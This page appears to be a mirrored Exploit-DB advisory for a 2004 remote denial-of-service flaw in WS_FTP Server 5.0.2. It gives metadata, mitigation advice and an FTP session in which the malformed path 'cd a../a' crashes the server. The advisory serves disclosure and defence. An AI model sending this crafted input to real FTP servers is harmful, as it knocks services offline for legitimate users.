header-logo
Suggest Exploit
vendor:
WS_FTP Server
by:
Not mentioned
5.5
CVSS
MEDIUM
Denial of Service
20
CWE
Product Name: WS_FTP Server
Affected Version From: 5.0.2
Affected Version To: Not mentioned
Patch Exists: NO
Related CWE: Not mentioned
CPE: a:ws_ftp:ws_ftp_server:5.0.2
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
2004

WS_FTP Server Remote Denial of Service Vulnerability

A remote denial of service vulnerability exists in WS_FTP Server. This vulnerability occurs when the application processes a malformed file path through the 'cd' command. An attacker can exploit this vulnerability by sending a specially crafted file path to the server, causing it to crash and deny service to legitimate users.

Mitigation:

Upgrade to a version of WS_FTP Server that is not affected by this vulnerability. Alternatively, implement appropriate firewall rules to restrict access to the FTP server.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11065/info

WS_FTP Server is reported prone to a remote denial of service vulnerability. This issue presents itself when the application processes a malformed file path through the 'cd' command.

WS_FTP Server version 5.0.2 is reported prone to this issue, however, other versions may be affected as well. 

E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a
Connection closed by remote host.

Navigation

Suggest Exploit

Services By CQR